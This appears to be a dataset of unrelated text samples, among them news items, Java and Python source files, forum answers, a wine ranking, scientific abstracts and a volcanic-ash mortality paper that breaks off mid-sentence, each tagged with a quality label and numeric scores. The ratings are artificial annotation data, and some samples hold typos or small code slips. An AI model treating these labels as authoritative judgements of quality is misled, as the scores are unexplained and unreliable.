You are here Armed Teen Held after Grasse School Shooting Grasse school shooting incident shocked French people as three people suffered gunshots while five others were injured during stampede after the incident. A teenager has been held by plice. In southeastern French town near Cannes, the shooting incident at the cafeteria of the Tocqueville high school has left many people shocked. Gun violence in schools is rare in France. After the incident, schools in Grasse were locked down. Local authorities urged parents to stay away and to not act in panic. After first gunshots, students at cafeteria were seen hiding under tables or looking for exit from the scene. Reports suggest that the gunman was heavily armed with several weapons. Security agencies informed that there were two people involved in attack but only one teenager has been arrested till the filing of this report. Emmanuel Ethis, head of local educational services, said, "Students are safe. Thank you to parents for not coming yet so that security forces can operate." Early reports from the city suggest that the teenager caught by police was generally a well-behaved person. An eyewitness said, “I just know the gunman by sight. He was gentle and low-key, not a nasty guy.” Security agencies have confirmed that the incident was not a ‘terror’ activity. They are still trying to understand the reason behind violence at school cafeteria. An official report informed, “The person arrested is a 17-year-old student, previously unknown to police, who was carrying an array of weapons, including a rifle, two handguns and two grenades.”
Mid
[ 0.6072186836518041, 35.75, 23.125 ]
/******************************************************************************* * Copyright (c) 2015, 2020 Pivotal Software, Inc. * All rights reserved. This program and the accompanying materials * are made available under the terms of the Eclipse Public License v1.0 * which accompanies this distribution, and is available at * https://www.eclipse.org/legal/epl-v10.html * * Contributors: * Pivotal Software, Inc. - initial API and implementation *******************************************************************************/ package org.springframework.ide.eclipse.boot.dash.views; import java.util.ArrayList; import java.util.Collection; import java.util.List; import java.util.concurrent.CompletableFuture; import java.util.concurrent.CompletionException; import java.util.concurrent.ExecutionException; import java.util.concurrent.TimeUnit; import java.util.concurrent.TimeoutException; import org.eclipse.core.runtime.IProgressMonitor; import org.eclipse.core.runtime.IStatus; import org.eclipse.core.runtime.Status; import org.eclipse.core.runtime.jobs.ISchedulingRule; import org.eclipse.core.runtime.jobs.Job; import org.eclipse.core.runtime.jobs.MultiRule; import org.eclipse.swt.widgets.Display; import org.springframework.ide.eclipse.boot.core.BootActivator; import org.springframework.ide.eclipse.boot.dash.model.BootDashElement; import org.springframework.ide.eclipse.boot.dash.model.BootDashModel.ElementStateListener; import org.springframework.ide.eclipse.boot.dash.model.RunState; import org.springsource.ide.eclipse.commons.frameworks.core.util.JobUtil; import com.google.common.base.Objects; /** * An action who's intended effect is to transition a BootDashElement to a * given goal state. * * @author Kris De Volder */ public abstract class RunStateAction extends AbstractBootDashElementsAction { private static final boolean DEBUG = false; //(""+Platform.getLocation()).contains("kdvolder"); private static void debug(String string) { if (DEBUG) { System.out.println(string); } } public boolean showInToolbar() { return true; } protected static class BdeSchedulingRule implements ISchedulingRule { private BootDashElement element; public BdeSchedulingRule(BootDashElement element) { this.element = element; } @Override public boolean contains(ISchedulingRule rule) { if (rule instanceof BdeSchedulingRule) { BootDashElement other = ((BdeSchedulingRule) rule).element; return Objects.equal(element, other); } return false; } @Override public boolean isConflicting(ISchedulingRule rule) { if (rule instanceof BdeSchedulingRule) { BootDashElement other = ((BdeSchedulingRule) rule).element; if (element != null && other != null) { return isAncestor(other, element) || isAncestor(other, element); } } return false; } private boolean isAncestor(BootDashElement ancestor, BootDashElement e) { while (e != null) { if (e.equals(ancestor)) { return true; } else { Object parent = e.getParent(); e = parent instanceof BootDashElement ? (BootDashElement) parent : null; } } return false; } } private static final ISchedulingRule SCEDULING_RULE = JobUtil.lightRule("RunStateAction.RULE"); final RunState goalState; private ElementStateListener stateListener = null; protected void configureJob(Job job) { ISchedulingRule rule = getSelectedElements().isEmpty() ? SCEDULING_RULE : MultiRule.combine( getSelectedElements().stream().map(BdeSchedulingRule::new).toArray(ISchedulingRule[]::new)); job.setRule(rule); } public RunStateAction(Params params, RunState goalState) { super(params); debug("Create RunStateAction "+goalState); this.goalState = goalState; model.addElementStateListener(stateListener = new ElementStateListener() { public void stateChanged(BootDashElement e) { Display.getDefault().asyncExec(new Runnable() { public void run() { updateEnablement(); } }); } }); } @Override public void updateEnablement() { Collection<BootDashElement> selecteds = getSelectedElements(); setEnabled(appliesTo(selecteds)); } @Override public void updateVisibility() { /** * TODO: Evaluate possibility of adding new API on BootDashModel and/or * BootDashElement to check whether element supports run states. * Currently run state == null means element doesn't support run states */ boolean visible = !getSelectedElements().isEmpty(); for (BootDashElement e : getSelectedElements()) { boolean vis = isVisibleForElement(e); if (!vis) { visible = false; break; } } setVisible(visible); } protected boolean isVisibleForElement(BootDashElement e) { return e.getRunState() != null && e.supportedGoalStates().contains(goalState); } private boolean appliesTo(Collection<BootDashElement> selection) { for (BootDashElement e : selection) { if (!appliesTo(e)) { return false; } } return !selection.isEmpty(); } private boolean appliesTo(BootDashElement e) { return goalStateAppliesTo(e) && currentStateAcceptable(e.getRunState()) && appliesToElement(e); } /** * Subclass can override when action should only apply to * certain boot dash elements */ protected boolean appliesToElement(BootDashElement e) { return true; } /** * Subclass can override when action should only apply to * processes in a specific runState. */ protected boolean currentStateAcceptable(RunState runState) { return true; } protected boolean goalStateAppliesTo(BootDashElement e) { return e.supportedGoalStates().contains(goalState); } @Override public String toString() { return "RunStateAction("+goalState+")"; } /** * Subclass can override to define custom 'work' this action does when it is triggered. * Default implementation just calls 'setGoalState', on all selected / applicable elements.` */ protected Job createJob() { final Collection<BootDashElement> selecteds = getSelectedElements(); if (!selecteds.isEmpty()) { return new Job("Suspending " + selecteds.size() + " Boot Dash Elements") { protected IStatus run(IProgressMonitor monitor) { monitor.beginTask("Stopping " + selecteds.size() + " Elements", selecteds.size()); try { List<CompletableFuture<Void>> futures = new ArrayList<>(selecteds.size()); for (BootDashElement el : selecteds) { if (appliesTo(el)) { futures.add(CompletableFuture.runAsync(() -> { try { el.setGoalState(goalState); monitor.worked(1); } catch (Exception e) { monitor.worked(1); throw new CompletionException(e); } })); } } try { CompletableFuture.allOf(futures.toArray(new CompletableFuture[futures.size()])).get(60, TimeUnit.SECONDS); } catch (InterruptedException e) { BootActivator.createErrorStatus(e); } catch (ExecutionException e) { BootActivator.createErrorStatus(e); } catch (TimeoutException e) { BootActivator.createErrorStatus(e); } return Status.OK_STATUS; } finally { monitor.done(); } } }; } return null; } public final void run() { Job job = createJob(); if (job!=null) { configureJob(job); job.schedule(); } } @Override public void dispose() { debug("DISPOSE RunStateAction "+getGoalState()); super.dispose(); if (stateListener!=null) { //Avoid leaking model listeners model.removeElementStateListener(stateListener); stateListener = null; } } public RunState getGoalState() { return goalState; } }
Low
[ 0.521551724137931, 30.25, 27.75 ]
A team of scientists from Melbourne's La Trobe University has shown a protein found in a tobacco plant has the potential to fight life-threatening infectious diseases. The scientific discovery, published in the journal Nature Communications, could lead to the development of a new class of antibiotics and meet the challenge of rising antibiotic resistance. Dr Mark Hulett and Dr Marc Kvansakul from the La Trobe Institute for Molecular Science said their team had demonstrated the peptide NaD1 found in the flowers of the ornamental tobacco plant Nicotiana alata has infection-busting qualities. "Infectious diseases are a major global health problem, accounting for more than one in eight deaths and mortality rates are predicted to skyrocket over the next 30 years," Dr Hulett said. "Antibiotic resistance at the current rate will eventually lead to the exhaustion of effective long-term drug options. It's imperative we develop new antibiotic treatments." Using the power of the Australian Synchrotron, the team led by Dr Hulett and Dr Kvansakul have shown in atomic detail how the tobacco plant peptide can target and destroy the micro-organism responsible for a dangerous fungal infection. advertisement The peptide perforates the parachute-like outer layer of Candida albicans cells, ripping them apart and causing them to explode and die. "They act in a different way to existing antibiotics and allow us to explore new ways of fighting infections. "It's an exciting discovery that could be harnessed to develop a new class of life-saving antimicrobial therapy to treat a range of infectious diseases, including multidrug-resistant golden staph, and viral infections such as HIV, Zika virus, Dengue and Murray River Encephalitis." In 2014, Dr Hulett and Dr Kvansakul found NaD1 could also be effective in killing cancer cells. Background Candida albicans is responsible for life-threatening infections in immune-compromised patients, including those diagnosed with cancer and transplant recipients. There are limited effective antibiotics available to treat the infection. Nicotiana alata flowers naturally produce potent antifungal molecules for protection against disease. The plant is related, but different, to tobacco plants grown for commercial use.
High
[ 0.743515850144092, 32.25, 11.125 ]
“I too have a Nuclear Button, but it is a much bigger & more powerful one than his, and my Button works!” President Trump wrote on Twitter, taunting the North Korean leader Kim Jong-un.
Low
[ 0.33532041728763, 14.0625, 27.875 ]
USCGC Yellowfin USCGC Yellowfin (WPB-87319) is an long of the United States Coast Guard built by Bollinger Shipyards in Lockport, Louisiana. She was the nineteenth vessel in her class, which was so successful that the Coast Guard commissioned 73 cutters. She is homeported in San Juan, Puerto Rico. Design Like her sister ships she was designed for a crew of ten on missions of up to five days. She was designed for mixed-gender crews. Her modest armament is a pair of M2 Browning Heavy Machine Guns. She was designed with a stern launching ramp that allows her to deploy and retrieve a high-speed pursuit boat without first coming to a stop. Only a single crew member is required to remain on deck when the pursuit boat is being launched or retrieved. Operational history In September 2017 Yellowfin was one of the 13 Coast Guard cutters that was tasked to assist Puerto Rico respond to Hurricane Maria. On August 30, 2018, Yellowfin and intercepted a go-fast carrying four drug smugglers from the Dominican Republic, and of cocaine. On November 30, 2018, Yellowfin took part in a remembrance ceremony in Charleston, South Carolina, for those lost in the wreck of the pleasure craft Morning Dew, which sank with all hands on March 17, 1998. References Category:Marine Protector-class coastal patrol boats Category:Ships built in Lockport, Louisiana
High
[ 0.6745843230403801, 35.5, 17.125 ]
Q: Binary Programming with nonlinear constraints i have the following type of problem i'm interested to solve: Minimize the objective function: $f(x_1,\ldots, x_8) = \sum_{i=1}^8 a_i x_i$ with $a_i \in [0, \infty)$ and $x_i \in \{0,1\}$ and given constraints:$\\ \begin{align} x_1+x_2+x_3+x_4 &= 1\\ x_5+x_6+x_7+x_8 &= 1\\ x_1x_5 + x_2x_6 + x_4x_8 + x_4x_7 &= 1 \end{align}$ Later i want to solve this type of problem with say 200 variables. Is there a matlab implementation to this? I only know yet the binintprog function to solve linear binary programming. Also I think, that this could be computationally extremly hard to solve. A: I've just noticed (thanks to @Macavity) that $x \in \{0,1\}$, not $x \in [0,1]$. Then, your system as it is, is trivial. The first equation says: exactly one of $x_i$ for $i \in \{1,2,3,4\}$ equals 1, and the second implies the same for $i \in \{5,6,7,8\}$. The third ensures that exactly one pair must be "enabled", so you need to find minimum of $a_i+a_j$ such that $x_ix_j$ term belongs to the third formula, that's it. This easily extends to solutions with more variables and the same form. On the other hand, it might be very hard to find a solution for a general problem, the issue being you can easily embed any logical formula into it, particularly the SAT problem. Finally, there is a hope for some formulas, including those that can be converted to 2-SAT, for example, it is alright as long as your constraints mention at most two variables at a time. I hope this helps ;-)
Mid
[ 0.581818181818181, 36, 25.875 ]
Como todos los años, en marzo las bodegas, distribuidores e importadores del mundo esperan los resultados de las degustaciones del célebre crítico norteamericano de vinos Stephen Tanzer. El experto, reconocido internacionalmente, recorre los el mundo y evalúa las mejores cepas. En la lista de 370 etiquetas degustadas, lidera la bodega Catena Zapata, que se adueñó de cuatro puestos entre los cinco primeros. Viña Cobos obtuvo el tercer lugar. Tanzer dijo, tras dar a conocer los resultados: "La Argentina está elaborando una importante cantidad de vinos world-class, como nunca lo había hecho hasta ahora. En los últimos años, los productores se han vuelto cada vez más sofisticados, eligiendo plantar determinadas uvas en determinados microclimas específicos – por ej, en microclimas con una determinada altura y exposición solar. Los mejores viñedos de Mendoza están plantados en zonas altas (generalmente entre 900 y 1500 msnm), lo cual mitiga parcialmente el efecto del calor desértico". El vino estrella en el listado de Tanzer fue el Catena Zapata Malbec Nicasia Vineyard 2011, que obtuvo el primer puesto entre todos los vinos argentinos. En segundo lugar Tanzer ubicó a otro vino de Catena Zapata, el Catena Zapata White Bones Chardonnay, elaborado a partir de uvas provenientes de una parcela del viñedo Adrianna de la familia, situado en Gualtallary, Tupungato, a 1500 m de altura. Un informe de esta bodega señala que este vino es el resultado del descubrimiento de Laura Catena al haber observado como bióloga que los suelos aluvionales de Mendoza presentan como característica relevante que no son homogéneos; o sea que en pequeñas distancias se observan diferencias en la composición física y química del suelo en cada parcela identificada. Y lo más relevante: de cada parcela se obtienen vinos con aromas y sabores diferentes. Según se informa, descubrir las parcelas con mayor calidad que el promedio del total de las parcelas que componen un viñedo es un paso verdaderamente revolucionario en esta tarea titánica de elaborar vinos argentinos que puedan competir en calidad con los mejores del mundo. Catena Zapata lo denomina la revolución de las parcelas. Es una verdadera profundización del clásico concepto francés que atribuye al terroir todo el mérito de la calidad. Este es el listado de los 50 mejores puntajes de vinos: 1. Catena Zapata Malbec Nicasia Vineyard La Consulta 2011, Catena Zapata (96pt) 2. Chardonnay White Bones Adrianna Vineyard 2011, Catena Zapata (95+pt) 3. Cobos Volturno Proprietary Red Wine Perdriel 2012, Viña Cobos (95pt) 4. Malbec Argentino 2011, Catena Zapata (94+pt) 5. Malbec Catena Zapata Adrianna Vineyard Gualtallary 2011, Catena Zapata (+94pt) 6. Cheval des Andes 2010, Terrazas de los Andes (94+pt) 7. Finca Bella Vista Malbec 2012, Achaval Ferrer (94pt) 8. Chardonnay White Stones Adrianna Vineyard 2011, Catena Zapata (93+pt) 9. Gran Enemigo Cabernet Franc Gualtallary 2011, Aleanna (93+pt) 10. Cobos Malbec Marchiori Vineyard Block C2 2012, Viña Cobos (93+pt) 11. Malbec Catena Alta 2011, Catena Zapata (93pt) 12. Bramare Malbec Marchiori Vineyard 2012, Viña Cobos (93pt) 13. Nicolas Catena Zapata 2011, Catena Zapata (92+pt) 14. Pinot Noir Cincuenta Y Cinco 2013, Chacra (92+pt) 15. Cabernet Sauvignon Alta 2011, Catena Zapata (92+pt) 16. J. Alberto Malbec 2013, Noemia (92+pt) 17. Malbec 2012, Noemia (92+pt) 18. Brioso 2012, Susana Balbo (92+pt) 19. Bramare Malbec Zingaretti Vineyard Villa Bastiás 2012, Viña Cobos (92+pt) 20. Bramare Malbec Rebón Vineyard 2012, Viña Cobos (92+pt) 21. Gran Enemigo Single Vineyard Cabernet Franc Agrelo 2011, Aleanna (92+pt) 22. Finca Altamira Malbec 2012, Achaval Ferrer (92pt) 23. Expresivo 2013, BenMarco (92pt) 24. Viñas de Davalos 2010, Tacuil (92pt) 25. Enzo Bianchi 2010, Valentín Bianchi (92pt)
Mid
[ 0.6466165413533831, 32.25, 17.625 ]
import _plotly_utils.basevalidators class CustomdataValidator(_plotly_utils.basevalidators.DataArrayValidator): def __init__(self, plotly_name="customdata", parent_name="funnel", **kwargs): super(CustomdataValidator, self).__init__( plotly_name=plotly_name, parent_name=parent_name, edit_type=kwargs.pop("edit_type", "calc"), role=kwargs.pop("role", "data"), **kwargs )
Low
[ 0.500986193293885, 31.75, 31.625 ]
<< Is the W-2 reporting of the SDI tax significant as far as eligibility for itemization and deduction? Looking at a a few different W-2s, the SDI amounts are reported variously in boxes 14 and 19. Based on perusal of some earlier posts, and the 1040 sch. A (and W-2) instructions, I think the employer has the choice of where to report this, and it has no significance as far as whether or not it may be included on schedule A, right? >> Placement on the W-2 makes no difference. << 2. If an employer offers an "enhanced" disability plan (typically supplement or replace the SDI payment to enable payout of a larger fraction of salary during disability), is this still itemizable? (If yes, presumably, only up to the normal ceiling on SDI taxes.) >> Neither a replacement nor a supplement is deductible, because neither is a tax. (Disability premiums are not deductible as a medical expense either.) If the employer offers a supplement and you still pay SDI, you can still deduct the SDI. Announcements Disclaimer: In accordance with IRS Circular 230, you cannot use the contents of any post on The Motley Fool's message boards to avoid tax-related penalties under the Internal Revenue Code or applicable state or local tax law provisions. Foolanthropy 2014! By working with young, first-time moms, Nurse-Family Partnership is able to truly change lives – for generations to come. When Life Gives You Lemons We all have had hardships and made poor decisions. The important thing is how we respond and grow. Read the story of a Fool who started from nothing, and looks to gain everything. Work for Fools? Winner of the Washingtonian great places to work, and Glassdoor #1 Company to Work For 2015! Have access to all of TMF's online and email products for FREE, and be paid for your contributions to TMF! Click the link and start your Fool career.
Mid
[ 0.5720000000000001, 35.75, 26.75 ]
/* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ package org.apache.accumulo.core.spi.scan; import java.util.Map; import java.util.Optional; /** * Interface for obtaining information about a scan executor * * @since 2.0.0 */ public interface ScanExecutor { interface Config { /** * @return the unique name used to identified executor in config */ String getName(); /** * @return the max number of threads that were configured */ int getMaxThreads(); /** * @return the prioritizer that was configured */ Optional<String> getPrioritizerClass(); /** * @return the prioritizer options */ Map<String,String> getPrioritizerOptions(); } /** * @return The number of task queued for the executor */ int getQueued(); /** * @return The configuration used to create the executor */ Config getConfig(); }
Mid
[ 0.600806451612903, 37.25, 24.75 ]
Scanning electron microscopic observations on the 9-day opossum (Didelphis virginiana) embryo. All three germ layers are present in the opossum embryo by the 9th prenatal day. The embryo proper is part of, and continuous with, the remainder of the chorionic wall. The wall of the yolk sac-chorion away from the embryo consists only of an outer covering of ectoderm and an inner layer of endoderm. Ectodermal cells covering the neural folds have dome-shaped apices and often show large, bleb-like expansions. Microvilli are short and few in number. The apical surfaces of ectodermal cells that overlie the parietal mesoderm are relatively smooth and show scattered, short microvilli that tend to be concentrated at cell junctions. The apices of ectodermal cells that cover the extraembryonic region are more rounded, and the cells balloon from the surface. Each cell shows abundant elongate microvilli and occasional cytoplasmic blebs. Endodermal cells that line the chorion and form the third (innermost) layer of the embryo are similar in their surface morphology.
Mid
[ 0.6414141414141411, 31.75, 17.75 ]
Konya Airport Konya Airport () is a military air base and public airport in Konya, Turkey. The airport is also used by NATO. Opened to the public in 2000, the airport is 18 km from the city. In 2006, Konya Airport served 2,924 aircraft and 262,561 passengers. The passenger terminal of the airport covers an area of 2,650 m² and has parking for 278 cars. Konya Airport is home to the 3rd Air Wing (Ana Jet Üssü or AJÜ) of the 1st Air Force Command (Hava Kuvvet Komutanlığı) of the Turkish Air Force (Türk Hava Kuvvetleri). Other wings of this command are located in Eskişehir (LTBI), Ankara Akıncı (LTAE), Bandırma (LTBG) and Balıkesir (LTBF). In 2015 a complete new airport terminal was opened with the capacity increased above 5 times the actual. Airlines and destinations Traffic Statistics (*)Source: DHMI.gov.tr References External links Category:Airports in Turkey Category:Turkish Air Force bases Category:Buildings and structures in Konya Province Category:Transport in Konya Province
Mid
[ 0.570175438596491, 32.5, 24.5 ]
Rigidity in parent-child interactions and the development of externalizing and internalizing behavior in early childhood. Behavioral rigidity is a common feature of many psychopathologies, yet the association between rigidity and the development of childhood psychopathology has not been studied. State space grids (a dynamic systems [DS] method) were used to examine the relation between rigidity in parent-child interactions and childhood externalizing and internalizing problems. High-risk kindergarten children (n = 240) and their parents were observed for 2 hr engaging in a variety of tasks that were expected to elicit a range of affect. State space grid analysis of the observational data revealed an association between rigidity in parent-child interactions and child externalizing behavior problems in the fall and spring of kindergarten and 1st grade, and with growth in those problems over time. Rigidity was associated with concurrent levels and with chronic high-level internalizing problems. Strengths and limitations of the new DS methodology in relation to understanding child psychopathology are discussed.
High
[ 0.660377358490566, 35, 18 ]
1. Introduction {#sec1} =============== Mount Sakurajima in Kagoshima, Japan, is the world\'s most active volcanoes located near metropolitan areas ([Figure 1](#fig1){ref-type="fig"}). During a large eruption in 1914, lava discharged by the volcano connected the Island of Mt. Sakurajima to the Ohsumi peninsula. Since then, the volcano has become active every 10--30 years; active periods were around 1935, 1946, 1956--1967, and the period between 1972 and 2001 with its peak in 1985. In the neighborhood of Mt. Sakurajima, the largest amounts of ashfall were recorded in Sakurajima town, which is located on the foot of this mountain, and Tarumizu city, which are 5--15 km away from Mt. Sakurajima. In the 1980s, the amounts ashfall in Sakurajima-Tarumizu area exceeded 10,000 g/m^2^/yr on average according to the official report of Kagoshima Prefectural Government. Ashes from Mt. Sakurajima contain approximately 60% of SiO~2~, which was mainly noncrystalline \[[@B1]\]. Recently, Hillman reported that the Sakurajima ash in general contains up to 7 wt% of cristobalite but no other silica polymorphs \[[@B2]\]. The presence of cristobalite in ash raises concerns about adverse health effects of long-term human exposure to ash. Crystalline silica is found in not only the ash from Mt. Sakurajima but also the ash from other volcanoes. In the case of Soufriere Hills volcano, Montserrat, the sub-10-micrometer fraction of ash generated by pyroclastic flows formed by lava dome collapse contains 10 to 24 weight percent of crystalline silica \[[@B3]\]. Although many studies examined the health effects of Mt. Sakurajima\'s volcanic activity among the residents in its neighborhood \[[@B4]\], no evident chronic health effects have been confirmed. However, the studies in the 1980s and the early 1990s could not examine the long-term effects of Mt. Sakurajima\'s volcanic activities, which peaked in the mid-1980s. In the present study, we examined the standardized mortality ratios of respiratory diseases, including lung cancer, in Sakurajima town and Tarumizu city during the period 1968--2002, and compared them with those of Kanoya city, which has much smaller amounts of ashfall than the Skurajima-Tarumizu area, in order to evaluate the long-term health effect of Mt. Sakurajima\'s volcanic activities. 2. Materials and Methods {#sec2} ======================== Sakurajima town has the population of about 4.000 and is situated on the foot of Mt. Sakurajima. Tarumizu city has the population of about 20.000 and is located within 10 km from Mt. Sakurajima. Kanoya city, with the population of about 100.000, neighbors Tarumizu city but is located at the further position from Mt. Sakurajima and therefore has much smaller amounts of ashfall. None of those municipalities has serious air pollution from traffic exhaustion. In the present study, we examined mortality of respiratory diseases other than tuberculosis. One of them was malignant neoplasm of trachea, bronchus, and lung (ICD9th: 162). We simply called this disease entity "lung cancer" (ICD9th: 162) in the present study. Other important respiratory diseases excluding pulmonary tuberculosis are "diseases of respiratory system" (ICD9th: 460--519). This disease category is divided into the following groups in ICD9th: acute respiratory infections (ICD9th: 460--466), other diseases of upper respiratory infection (ICD9th: 470--478), pneumonia and influenza (ICD9th: 480--487), chronic obstructive pulmonary disease and allied conditions (ICD9th: 490--496), pneumoconiosis and other lung diseases due to external agents (ICD9: 500--508), and other diseases of respiratory system (ICD9th: 510--519). In this study, we combined "acute respiratory infections" and "pneumonia and influenza" (ICD9th: 480--487) and called this category as acute respiratory diseases (ICD9th: 460--466, 480--487). On the other hand, the disease categories of "other diseases of upper respiratory infection" (ICD9th: 470--478) and "other diseases of respiratory system" (ICD9th: 510--519) were not included in our study. We concluded that they were not important for the present study because the number of deaths from those diseases was small, and they were, in a sense, an ill-defined disease category. Needless to say, we were interested in "pneumoconiosis and other lung diseases due to external agents" (ICD9th: 500--508), which may be associated with volcanic activities. However, the publication by the local health authority does not present the number of deaths for this disease category. Standardized mortality ratios (SMRs) of deaths from lung cancer (ICD9th: 162), acute respiratory diseases (ICD9th: 460--466, 480--487), and COPDs (ICD9th: 490--496) in the Sakurajima-Tarumizu area (exposed area) and Kanoya city (control area) were calculated as a ratio between observed and expected numbers of deaths. The numbers of deaths from lung cancer (ICD9th: 162), acute respiratory diseases (ICD9th: 460--466, 480--487), and COPDs (ICD9th: 490--496) were obtained from the annual Vital Statistics Report published by the Kagoshima Prefectural Municipal Government. The expected numbers of deaths were obtained through multiplying age-gender-year-specific population numbers of Sakurajima-Tarumizu area or Kanoya city by corresponding gender-, age- (5-year category), and year-specific mortality rates for lung cancer (ICD9th: 162), acute respiratory diseases (ICD9th: 460--466, 480--487), and COPDs (ICD9th: 490--496) in Kagoshima Prefecture (population of about 1.6 million), which were obtained from the annual Vital Statistics Report published by the Kagoshima Prefectural Municipal Government. The 95% confidence intervals (95% CIs) of SMRs were obtained by the methods assuming poisson distribution \[[@B5]\]. The number of residents specific for gender and age (5-year category) in Sakurajima-Tarumizu area and Kanoya city was obtained by the national census conducted every 5 years. The population in 1970 was used for 1968--1972, 1975 for 973--1977, 1980 for 1978--1982, 1985 for 1983--1987, 1990 for 1988--1992, 1995 for 1993--1997, and 2000 for 1998--2002. The data on the amount of ashfall were obtained from the website of Kagoshima Prefectural Government. 3. Results {#sec3} ========== The SMR of lung cancer in Sakurajima-Tarumizu area was 1.61 (95% CI = 1.44--1.78) for men and 1.67 (95% CI = 1.39--1.95) for women, indicating that lung cancer mortality was significantly increased when compared to the entire Kagoshima Prefecture. Sakurajima-Tarumizu area had a significantly increased COPD mortalities (SMR for men and women combined = 1.81, 95% CI = 1.63--2.00; data not shown in [Table 1](#tab1){ref-type="table"}) and acute respiratory diseases (SMR = 1.12, 95% CI = 1.08--1.16). It should be noted that the SMRs for acute respiratory diseases were evidently lower than those for lung cancer and COPDs, and the differences between acute respiratory diseases and the other two diseases were significant since the 95% CI of the SMR of acute respiratory diseases did not overlap with those with the other two respiratory diseases. Kanoya city, which is about 30 km away from Mt. Sakurajima, has ashfall of 640 g/m^2^/yr, which is less than 10% of that in Sakurajima-Tarumizu area. However, the mortality rates of lung cancer, COPDs, and acute respiratory diseases in Kanoya city were significantly decreased when compared to Kagoshima prefecture. Note that the upper 95%CIs of the SMRs for those respiratory diseases in Kanoya were below the unity. 4. Discussion {#sec4} ============= The present study showed that residents in Sakurajima-Tarumizu area, located near Mt. Sakurajima, experienced relatively high mortality of respiratory diseases, including lung cancer and COPDs. The consistently high SMR of lung cancer in Tarumizu during the entire period of our statistical analysis (1968--2002) suggests long-term effects of Mt. Sakurajima, which has become active every 10--30 years over the last 100 years. Confounding of smoking is unlikely among women since the proportion of female smokers is less than 20% in Japan \[[@B6]\]. The proportion of smokers among men and women was reported to be 39% and 6%, respectively, in Tarumizu city, and was 40% and 8%, respectively in Kanoya city (unpublished data provided by Kanoya Public Health center). It should also be noted that the relative risk comparing smokers and nonsmokers among women is at maximum 5 \[[@B7]\] since heavy smokers are rare and the age starting smoking is around 30 years of age among women \[[@B6]\]. The mortality of smoking-related cancers other than lung cancer in the Sakurajima-Tarumizu area among men was similar to that in Kanoya city (data not shown). Taken together, smoking is unlikely to explain the increased lung cancer risk among men and women in Sakurajima-Tarumizu area. Suspended particulate matter (SPM) is a possible factor that increased the mortality of lung cancer and COPDs in Sakurajima-Tarumizu area. However, Nishii et al. reported the lack of significant correlation between SPM concentrations and the amount of ashfall \[[@B8]\]. At the observatory stations in Sakurajima town (the period of 1990--2007), Tarumizu city (the period of 1979--1993), and Kanoya city (the period of 1988--1993), the annual average concentration of SPM was 0.022--0.044 mg/m^3^, 0.025--0.035 mg/m^3^ and 0.027--0.036 mg/m^3^, respectively (Kagoshima Prefecture Government). On the basis of what was reported by Steenland et al. \[[@B9]\], we estimated that the cumulative exposure of 400 mg m^−3^ year increases lung cancer risk by 1.2-folds. In the Sakurajima-Tarumizu area, the cumulative amount of ashfall in the 1980s and 1990s was nearly 200,000 g m^−2^. Since the ash of Sakurajima contains approximately 7% of cristobalite, and its 10% is assumed to be respirable material (\<4 um) based on the finding of Hillman \[[@B2]\], cumulative exposure during that 20-year period could be as high as 1400 g m^−3^ year (=200.000 × 7% × 10%). The exposure to only 0.1% of 1400 g can increase lung cancer risk by 1.7-folds. Cristalline silica is known to cause silicosis or pneumoconiosis \[[@B10]\]. However, data on silicosis were not available in the present study. In a study of national health insurance claim, a few patients were found to have diagnosed as having pneumoconiosis in the Ushine and Kaikata districts of Tarumizu, which is a heavy ashfall area \[[@B11]\]. Unfortunately, however, the occupational history of those cases was not available. If silicosis may not be markedly increased in the vicinity of Mt. Sakurajima, we have to assume that crystobalite is able to increase lung cancer not through silicosis. Whether or not excessive lung cancer cases occur exclusively among subjects with silicosis remains uncertain \[[@B12]\]. The association of silica exposure with lung cancer risk is generally, but not uniformly, stronger among silicotics than nonsilicotics. There are a couple of studies that showed an increase of lung cancer risk among nonsilicotic subjects \[[@B12]\]. Checkoway and Franzblau concluded that population-based or individually based risk assessments should treat silicosis and lung cancer as distinct entities whose cause/effect relations are not necessarily linked until more conclusive epidemiologic findings become available \[[@B12]\]. What was reported in the present study supports the notion. Having said that, it should be pointed out that cristobalite may not be the only factor involved in the increased mortality of lung cancer and COPDs since volcanic activities release various carcinogens, including radioactive materials, into the air. The present study has several limitations. One is the lack of information on silicosis. Therefore, whether lung cancer patients had silicosis or not is not known. In addition, the mortality of silicosis and related diseases cannot be examined because the information is not made public. However, the study of Wakisaka et al. \[[@B11]\] suggested that silicosis is rare in the study area. In our preliminary analysis using the data for 1968--1995 in Tarumizu, the mortality of silicosis was increased by 1.6-folds among men but not increased among women. Another drawback is the lack of information of the residential history and the hours the residents stayed inside home. Hours spend outside the study areas were not available, either. It should be noted, however, that women tend to stay longer in the houses and tend not to work outside the study area. Since the increase of mortality from lung cancer and COPDs was observed not only among men but also among women, local environmental exposure is more likely to be related to the increased mortality of those diseases. The lack of information on smoking is also a serious drawback. However, as we discussed before, it is difficult for smoking to explain what was observed in the present study. In conclusion, cristobalite is the most likely cause of the increased deaths from those chronic respiratory diseases since smoking is unlikely to explain the increased mortality of respiratory diseases among women since the proportion of smokers in Japanese women is less than 20%, and SPM levels in the Sakurajima-Tarumizu area were not high. Further studies on the health effects of Mt. Sakurajima\'s volcanic activities seem warranted. Those studies should include the examination of indoor levels of crystalline silica. We selected Kanoya city as a control area since the ashfall was much less than Sakurajima-Tarumizu area while those two areas are closely located. Kanoya is slightly more urban than Sakurajima-Tarumizu. Therefore, we were afraid that the using Kanoya as a control may end up with underestimating the effects of volcanic activities on chronic respiratory disease mortality in Sakurajima-Tarumizu area. However, contrary to our expectation, Kanoya city had the mortality of respiratory disease mortality less than the entire Kagoshima, making the comparison more favorable for Sakurajima-Tarumizu area. 5. Conclusions {#sec5} ============== Mt. Sakurajima in Japan is one of the most active volcanoes in the world. In the last century, the volcano became active every 10--30 years. Its volcanic ash contains up to 7 wt.% of cristobalite, which is known to be carcinogenic. However, the chronic health effects of Mt. Sakurajima\'s volcanic activities were not clear. This study showed that Mt. Sakurajima\'s volcanic activities increased the mortality of lung cancer and COPDs in the Sakurajima-Tarumizu area, which has the largest amount of ashfall from the volcano in its vicinity. Further studies should be conducted to confirm the association between the volcanic activities and chronic respiratory disease mortality. Those studies should 